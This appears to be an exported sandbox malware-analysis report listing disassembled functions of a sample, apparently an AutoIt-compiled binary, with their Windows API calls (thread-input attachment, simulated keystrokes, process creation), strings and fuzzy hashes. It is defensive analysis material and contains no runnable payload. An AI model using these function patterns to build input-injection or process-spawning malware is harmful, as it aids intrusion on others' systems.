Opcode Fuzzy Hash: eccad1696ba090c5711fa55b6348286b496d6d94020a94e73532c489e0c9eeb3
Instruction Fuzzy Hash: 29318675A00205AFCB00EB68C845AEE77B4FF45318F10416BF506D7291EB799E86CB9A

Function 00458F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00459014
GetDlgCtrlID.USER32 ref: 0045901F
GetParent.USER32 ref: 0045903B
SendMessageW.USER32(00000000,?,00000111,?), ref: 0045903E
GetDlgCtrlID.USER32(?), ref: 00459047
GetParent.USER32(?), ref: 00459063
SendMessageW.USER32(00000000,?,?,00000111), ref: 00459066

Strings

ListBox, xrefs: 00458FD1
ComboBox, xrefs: 00458F9C

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: e527cb334e7d7689371befb81d6d0d32f7406071002c3aa4a78959359ae4abf1
Instruction ID: 6714b25adca5f569a88cfbaafbe7bd2dd1ba81f724cd7e2599907f028ed7346a
Opcode Fuzzy Hash: e527cb334e7d7689371befb81d6d0d32f7406071002c3aa4a78959359ae4abf1
Instruction Fuzzy Hash: D021D870A00108BFDF04ABA1CC85EFEB774EF45310F10062AF911672E2DB795819DB28

Function 0045907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 004590FD
GetDlgCtrlID.USER32 ref: 00459108
GetParent.USER32 ref: 00459124
SendMessageW.USER32(00000000,?,00000111,?), ref: 00459127
GetDlgCtrlID.USER32(?), ref: 00459130
GetParent.USER32(?), ref: 0045914C
SendMessageW.USER32(00000000,?,?,00000111), ref: 0045914F

Strings

ListBox, xrefs: 004590BC
ComboBox, xrefs: 00459087

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 788820521d6cad1a15555ef376c01a576536d52651f0e806491d71d2e8ddf36c
Instruction ID: 4d8cd3b83cca1d69534b37f7086261ba2dc9307f4c099413b547fbd15d3c7d68
Opcode Fuzzy Hash: 788820521d6cad1a15555ef376c01a576536d52651f0e806491d71d2e8ddf36c
Instruction Fuzzy Hash: AA21B674A00108BFDF01ABA5CC85EFEBB74EF44301F50452BB911A72A2DB795819DB29

Function 00459163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 0045916F
GetClassNameW.USER32(00000000,?,00000100), ref: 00459184
_wcscmp.LIBCMT ref: 00459196
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00459211

Strings

list, xrefs: 004591F3
details, xrefs: 004591BF
smallicons, xrefs: 004591D9
largeicons, xrefs: 004591A5
SHELLDLL_DefView, xrefs: 00459190

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: ea2da3042022fb33e5a84bdcfd4780e66fcf499551f9b63f672fb9db9d77b33f
Instruction ID: f102ea4107ca07b1db40aa5d7e68bb0b9a0f71bc8f584d68d6a8224326f4a83e
Opcode Fuzzy Hash: ea2da3042022fb33e5a84bdcfd4780e66fcf499551f9b63f672fb9db9d77b33f
Instruction Fuzzy Hash: 3111E776248317F9FA112624EC06DAB379CAB15721F30046BFD00E40D2FEA95C56666C

Function 004611CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 004611F0
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00460268,?,00000001), ref: 00461204
GetWindowThreadProcessId.USER32(00000000), ref: 0046120B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 0046121A
GetWindowThreadProcessId.USER32(?,00000000), ref: 0046122C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 00461245
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460268,?,00000001), ref: 00461257
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 0046129C
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 004612B1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00460268,?,00000001), ref: 004612BC

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 2caf1bd63dccf00636a063d85e3956ee9e2a291adaf0d7952c1a55c89920e2b2
Instruction ID: 1e48a1bdefc3aaf7905b324a82868e76ea33fb60fcd143e126220ea2d996acdd
Opcode Fuzzy Hash: 2caf1bd63dccf00636a063d85e3956ee9e2a291adaf0d7952c1a55c89920e2b2
Instruction Fuzzy Hash: 2B31D275600208BFDB109F54EC98F6A37A9EF54315F1582BEFA00E62B0E7789D448B5E

Function 00479113 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00479167
VariantInit.OLEAUT32(?), ref: 00479238
VariantInit.OLEAUT32(?), ref: 00479339
VariantClear.OLEAUT32(?), ref: 00479343
VariantClear.OLEAUT32(?), ref: 004793A0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 0047931C
,,I, xrefs: 004791E5
Null Object assignment in FOR..IN loop, xrefs: 004791C8, 004792F6, 004793AE

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: ,,I$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-2080382077
Opcode ID: 5e45a4bc97ccb967f3a94fe0c7eba0d1116f12234079cc91aabcb7686965c87b
Instruction ID: ae80b45066e4f78fbd037e562a23a34cf658a5e22d7790f01f39a3ab0041c2b1
Opcode Fuzzy Hash: 5e45a4bc97ccb967f3a94fe0c7eba0d1116f12234079cc91aabcb7686965c87b
Instruction Fuzzy Hash: 62919E30A00205ABDF20DFA1C848FEFB7B8EF49714F10855EE909AB281D7789D05CBA4

Function 0045A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,0045A439), ref: 0045A377

Strings

REGEXPCLASS, xrefs: 0045A13C
CLASSNN, xrefs: 0045A119
NAME, xrefs: 0045A1A9
TEXT, xrefs: 0045A2AE
CLASS, xrefs: 0045A0F6
INSTANCE, xrefs: 0045A285

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 1424eacf5de64af2c769219169cfdcdf02d038a0872950fffdd1f519614ed5ca
Instruction ID: 7454df241f77d0b93e78cd2df6a08ba454d4c5e8e9c0a671585cc9aba64ec447
Opcode Fuzzy Hash: 1424eacf5de64af2c769219169cfdcdf02d038a0872950fffdd1f519614ed5ca
Instruction Fuzzy Hash: BA91BB70600505AADB08DF61C452BEEF774BF04305F54822FEC59A7242DB3969ADCB99

Function 00402E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00402EAE

Part of subcall function 00401DB3: GetClientRect.USER32(?,?), ref: 00401DDC
Part of subcall function 00401DB3: GetWindowRect.USER32(?,?), ref: 00401E1D
Part of subcall function 00401DB3: ScreenToClient.USER32(?,?), ref: 00401E45

GetDC.USER32 ref: 0043CD32
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0043CD45
SelectObject.GDI32(00000000,00000000), ref: 0043CD53
SelectObject.GDI32(00000000,00000000), ref: 0043CD68
ReleaseDC.USER32(?,00000000), ref: 0043CD70
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0043CDFB

Strings

U, xrefs: 0043CCD0

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 3cdb49cb97ee06b786ec44539fc98b371f27cf3cd913876941f0ba4c68568fc2
Instruction ID: a06c30b2c7428a2a0e02ce49fef1101dc5652c1e0a779c9989b3b0b616dc9c80
Opcode Fuzzy Hash: 3cdb49cb97ee06b786ec44539fc98b371f27cf3cd913876941f0ba4c68568fc2
Instruction Fuzzy Hash: 8A71CB31400205DFCF219F64C884AAB3BB5FF48324F14567BFD55AA2A6C7389881DBA9

Function 00478C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,0048F910), ref: 00478D28
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0048F910), ref: 00478D5C
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00478ED6
SysFreeString.OLEAUT32(?), ref: 00478F00

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: e599abc5ccc1fcc2afa0811a74523479773a4e2d78cc03c258ebc6d435cce25a
Instruction ID: 5de9ffb64ca5e15a2b50b30bc9937a924b2564530b5861c8322637ebb6f06415
Opcode Fuzzy Hash: e599abc5ccc1fcc2afa0811a74523479773a4e2d78cc03c258ebc6d435cce25a
Instruction Fuzzy Hash: A4F12871A00109AFCB14DF94C888EEEB7B9FF49314F10846AF909AB251DB35AE46CB55

Function 0047F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0047F6B5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0047F848
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0047F86C
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0047F8AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0047F8CE
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0047FA4A
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0047FA7C
CloseHandle.KERNEL32(?), ref: 0047FAAB
CloseHandle.KERNEL32(?), ref: 0047FB22

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 2b929a1bd1707f893cecb8edf8898ba3ed00e552e1f4f34df02758bb210e9ca5
Instruction ID: 06b6fb47819207378a011b81351d7d70f99dbcb89b467e7706fbe8a6ff9703be
Opcode Fuzzy Hash: 2b929a1bd1707f893cecb8edf8898ba3ed00e552e1f4f34df02758bb210e9ca5
Instruction Fuzzy Hash: D8E194716042009FC714EF25C451BAA7BE1BF85314F14856EF8999B3A2DB38EC49CB5A

Function 00464CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00463697,?), ref: 0046468B

Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00463697,?), ref: 004646A4

Part of subcall function 00464A31: GetFileAttributesW.KERNEL32(?,0046370B), ref: 00464A32

lstrcmpiW.KERNEL32(?,?), ref: 00464D40
_wcscmp.LIBCMT ref: 00464D5A
MoveFileW.KERNEL32(?,?), ref: 00464D75

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: e5efdc4b7bed8b35d3c7756aed83619e761acd6f8ed92700794926c6f689935b
Instruction ID: 3e0d64ecfe06201b2d7f4e4ce82b19db3d94e317acadfd9fd6841a38a6d3c077
Opcode Fuzzy Hash: e5efdc4b7bed8b35d3c7756aed83619e761acd6f8ed92700794926c6f689935b
Instruction Fuzzy Hash: 1D5164B25083459BCB24EFA1D8819DF73ECAF84354F40092FB289D3151EE79A589C76B

Function 00488645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 004886FF

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 9e4666c3df532daa50fe19b6785993d851fb0bba6d5b1ec7531c4121b57b79da
Instruction ID: 67c69bdd2abc2e43d0d58bc2ecba6baab6695951e18c15bee5b3ec72a7eaee37
Opcode Fuzzy Hash: 9e4666c3df532daa50fe19b6785993d851fb0bba6d5b1ec7531c4121b57b79da
Instruction Fuzzy Hash: BE519530500244BEDB20BB298C89F5E7B64EB05724FA0492FF911E62E1DF79A990DB5D

Function 00402B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0043C2F7
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0043C319
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0043C331
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0043C34F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0043C370
DestroyIcon.USER32(00000000), ref: 0043C37F
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0043C39C
DestroyIcon.USER32(?), ref: 0043C3AB

Part of subcall function 0048A4AF: DeleteObject.GDI32(00000000), ref: 0048A4E8

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 30831d3652e0c4a0d09569093ab55e826fc0c5f0f59ece252e466e99477c3991
Instruction ID: 8b5e312d24aa0fc7293d55633b028b71e285ae3fa30838bdc618f7a4141ee9b3
Opcode Fuzzy Hash: 30831d3652e0c4a0d09569093ab55e826fc0c5f0f59ece252e466e99477c3991
Instruction Fuzzy Hash: 9D516A74A00205AFDB20DF65CD85FAF3BB5EB58310F10452EF902A72D0D7B4A991DB68

Function 0045966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0045A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0045A84C
Part of subcall function 0045A82C: GetCurrentThreadId.KERNEL32 ref: 0045A853
Part of subcall function 0045A82C: AttachThreadInput.USER32(00000000,?,00459683,?,00000001), ref: 0045A85A

MapVirtualKeyW.USER32(00000025,00000000), ref: 0045968E
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 004596AB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 004596AE
MapVirtualKeyW.USER32(00000025,00000000), ref: 004596B7
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 004596D5
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004596D8
MapVirtualKeyW.USER32(00000025,00000000), ref: 004596E1
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 004596F8
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004596FB

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 97659e6d0eeaf490ac976d3d5fe311f7ccd298156506907ffd454ad2a564656a
Instruction ID: 1862abde6b5ba1d27f2b77b23e96e8fddf5d6721de8ccd0207d4cd72f070cce3
Opcode Fuzzy Hash: 97659e6d0eeaf490ac976d3d5fe311f7ccd298156506907ffd454ad2a564656a
Instruction Fuzzy Hash: F011E571910618BEF6106F61DC49F6E3B1DDB4C755F100939F644AB0A1CAF25C15DBA8

Function 00458921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0045853C,00000B00,?,?), ref: 0045892A
HeapAlloc.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458931
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0045853C,00000B00,?,?), ref: 00458946
GetCurrentProcess.KERNEL32(?,00000000,?,0045853C,00000B00,?,?), ref: 0045894E
DuplicateHandle.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458951
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0045853C,00000B00,?,?), ref: 00458961
GetCurrentProcess.KERNEL32(0045853C,00000000,?,0045853C,00000B00,?,?), ref: 00458969
DuplicateHandle.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 0045896C
CreateThread.KERNEL32(00000000,00000000,00458992,00000000,00000000,00000000), ref: 00458986

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
